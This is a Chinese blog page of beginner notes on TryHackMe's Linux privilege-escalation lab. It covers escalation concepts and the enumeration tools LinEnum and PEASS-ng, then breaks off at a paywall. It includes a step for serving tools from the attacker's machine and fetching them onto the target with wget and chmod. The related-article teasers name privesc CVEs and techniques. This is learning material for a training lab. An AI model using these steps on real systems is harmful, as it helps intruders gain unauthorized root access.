常见的Linux权限提升 | TryHackMe - Common Linux Privesc

原创 于 2025-05-09 11:15:24 发布 · 835 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器 #网络安全 #安全 #笔记

常见的 Linux 提权

这里使用的是tryhackme的这个房间,里面的题目整体简单,适合权限提升新手去熟悉使用,这里也没有过多的去解释操作,而是作为一个笔记整理了权限提升的基础的手法

Linux权限提升

了解权限提升

权限提升的核心通常是从较低权限提升到较高权限。更确切地说,它是利用系统中的漏洞、设计缺陷或配置疏忽。 操作系统或应用程序获得未经授权的访问 通常对用户限制的资源。

在实战中,很难直接活得管理员权限的立足点,一般都是专门的低权限的网站用户权限,高权限可以让我们实现更多的操作

  • 重置密码
  • 绕过访问控制来破坏受保护的数据
  • 编辑软件配置
  • 启动持久型,方便后续的再次访问
  • 更改用户权限
  • 以及拿到根 Flag

权限提升的方向

主要是两种权限提升:

  • 水平提权: 通过控制与您相同权限级别的其他用户,扩大您对受感染系统的控制范围。
  • 垂直提权(权限提升):指尝试利用已攻陷的现有帐户获取更高权限或访问权限。

枚举

一般就是使用命令查看各种系统信息,从而发现可能的利用点,这里就推荐两个工具方便进行提权前的信息查看

LinEnum

PEASS-ng(这个工具是全平台的权限提升辅助工具,可以使用对应版本的工具)

如何把工具上传到目标机器:

  • 使用 python -m http.server [port]开启一个简单的文件服务器,然后在目标机器中使用 wget http://[your_ip_address]:[port]/[file_name]来下载,之后使用 chmod +x [file]来赋予执行的权限
    • 可以选择下载到 temp 目录
  • 也可以复制全部命令,到目标机器新建一个文件,粘贴进去,执行

在工具输出的结果中,我们重点关注

  • 内核信息
  • 敏感文件的权限,我们是否可以写入
  • SUID,GUID 文件,
最低0.47元/天 解锁文章
Tr3Ad1n
关注
Linux kernel权限提升漏洞 CVE-2021-3493
千寻的博客
04-24 1468
文章目录漏洞名称漏洞编号漏洞描述影响版本复现步骤第一步 查看ubuntu版本第二步 下载3493.py第三步 编译脚本第四步 运行EXP成功提权Root摘抄poc 漏洞名称 Linux kernel权限提升漏洞 漏洞编号 CVE-2021-3493 漏洞描述 Ubuntu OverlayFS Local Privesc CVE-2021-3493 EXP在Github被公开,可以通过EXP在Ubuntu多个影响系统中提升 ROOT权限 OverlayFS漏洞允许Ubuntu下的本地用户获得root
unix-privesc-check提权漏洞快速检测工具
墨痕诉清风的博客
05-10 1129
unix-privesc-check是Kali Linux自带的一款提权漏洞检测工具。它是一个Shell文件,可以检测所在系统的错误配置,以发现可以用于提权的漏洞。该工具适用于安全审计、渗透测试和系统维护等场景。它可以检测与权限相关的各类文件的读写权限,如认证相关文件、重要配置文件、交换区文件、cron job文件、设备文件、其他用户的家目录、正在执行的文件等等。如果发现可以利用的漏洞,就会给出提...
权限提升-Linux系统权限提升篇&Vulnhub&辅助项目&SUID权限&SUDO指令&版本漏洞
SuperherRo的博客
03-30 1487
1、Web或用户到Linux-配置不当-判断&利用 2、Web或用户到Linux-配置不当-SUID&GUID 3、Web或用户到Linux-配置不当-SUDO&CVE漏洞 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Linux提权——SUDO
热门推荐
negnegil的博客
09-03 1万+
使用Sudo权限提升Linux账户权限 在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
Linux权限
xxtzzxx的博客
08-08 1458
就像我们日常生活中提到的医生、教师、程序员等是对一种职业或是一类人的统称,而非指的是具体的某个人。查看上述代码不难看出,bash进程的数目在逐渐增多,会造成对操作系统资源的浪费,所以为了避免这样的情况发生,我们可以通过用户回退的方式来进行用户的切换。那当我们有这么一种需求,others可以在特定的目录下创建自己的文件、写入自己文件、删除自己的文件,但是不想让他删除别人的文件。此外,有这样的一个问题,如果一个目录文件对others具有w权限,那么用户是否能够删除掉目录文件中的其它拥有者的文件?......
Linux权限提升总结
m0_66458291的博客
04-01 1842
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务天、权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。
Linux权限提升大集合(超级全)
最新发布
2303_79592445的博客
03-15 1252
在本文中,我总结了一些自己在实践中常用的Linux提权方法,旨在为同样对系统安全感兴趣的朋友们提供一个参考。值得注意的是,这些信息仅供学习交流使用,请确保在合法合规的环境下进行实践与探索。由于个人经验有限,文中所列举的提权技巧可能并不全面,因此非常欢迎各位前辈、同行们能够不吝赐教,补充更多实用的方法或案例,让我们一起丰富这份资料的内容。无论是经典的sudo滥用、寻找SUID位的巧妙利用,还是针对特定服务配置错误的深度挖掘,每一种思路都可能为我们揭示通往更高权限的独特路径。希望通过这样的分享与交流,大家都能有
Linux提权辅助工具
LuckySec
04-24 6238
0x01 LinEnum 工具介绍 LinEnum 是一个高级 Bash 脚本,它从目标系统中提取了大量有用的信息,可以复制文件并进行导出,同时可以搜索包含关键字的文件。 项目地址:https://github.com/rebootuser/LinEnum LinEnum 执行的检查/任务的高级摘要: 内核和发行版详细信息 系统信息: 主机名 网络详情 当前IP 默认路由详情 DNS 服务器信息 用户信息: 当前用户详细信息 最后登录的用户
Unix-privesc-check一键检查 Unix 系统(KALI工具系列三十一)
LNN0212的博客
06-25 1164
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。unix-privesc-check 是一个用于检查 Unix 系统中潜在的提权漏洞的工具。
Windows-privesc-check:可独立执行,以检查Windows系统上的简单权限提升向量
02-19
以管理员权限运行时,windows-privesc-check对所有安全具有完全读取访问权限。 这样,它就可以对升级向量执行审计,例如: 重新配置Windows服务 如果文件文件权限弱,请替换服务文件 替换%ProgramFi
linux 程序提权,Linux提权辅助工具
weixin_39699313的博客
05-01 340
前几天有朋友问我找exp,其实有一个很好的程序可以检索你所需的exp--Linux_Exploit_Suggester我记得很多地方也有这款工具的介绍。这款工具也可以看到你当前系统的内核版本。root@Wing:~/Linux-exp# ./Linux-exp.plKernel local: 3.12.Searching among 64 exploits...Possible Exploits:...
linux提权辅助工具linux-smart-enumeration(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 1355
今天讲linux提权辅助工具三种之一的linux-smart-enumeration。 linux-smart-enumeration工具介绍,这个项目的灵感来自 https://github.com/rebootuser/LinEnum 并使用了它的许多测试。与 LinEnum 不同,lse它试图从隐私的角度根据其重要性逐步公开信息。该 shell 脚本将显示有关本地 Linux 系统安全性的相关信息,有助于提升权限。 项目地址:https://github.com/diego-treitos/lin
linux提权辅助工具LinEnum(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 1152
今天讲linux提权辅助工具三种之一的LinEnum。 LinEnum工具介绍 LinEnum 是一个高级 Bash 脚本,它从目标系统中提取了大量有用的信息,可以复制文件并进行导出,同时可以搜索包含关键字的文件。 项目地址:https://github.com/rebootuser/LinEnum LinEnum 执行的检查/任务的高级摘要:
又一款linux提权辅助工具 – Linux Exploit Suggester
ytfhjhv的博客
11-14 735
又一款linux提权辅助工具 – Linux Exploit Suggester
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
qq_51577576的博客
03-16 1112
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
linux提权辅助脚本整合
干铮的博客
02-20 2451
1. LinEnum的使用 这个脚本是用来收集系统的信息,如:特殊文件的权限、suid文件信息、网络端口信息。 sudo python -m SimpleHTTPServer 80 下载文件执行 wget http://192.168.0.109/LinEnum.sh 历史记录找到 root 密码yanisy123 2. linux-exploit-suggester的使用 这个用来检测是否存在提权cve漏洞 下载文件执行 wget https://raw.githubuserco.
Linux权限提升总结_linux 提权限
2401_84968977的博客
05-17 1644
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
提权辅助工具
prettyX的博客
01-10 779
0X00 内容 Windows提权辅助工具:Windows-Exploit-Suggester介绍及使用 Linux提权辅助工具:Linux Exploit Suggester 2介绍及使用 提权漏洞集合 0X01Windows-Exploit-Suggester介绍及使用 下载:https://github.com/GDSSecurity/Windows-Exploit-Sug...
Linux提权--准备工作&知识点&工具
金灰的博客
04-28 1115
1.提权方法有部分适用在不同环境,当然也有通用方法2.提权方法也有操作系统版本区分,特性决定方法利用面3.提权方法有部分需要特定环境,如数据库,第三方提权等。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值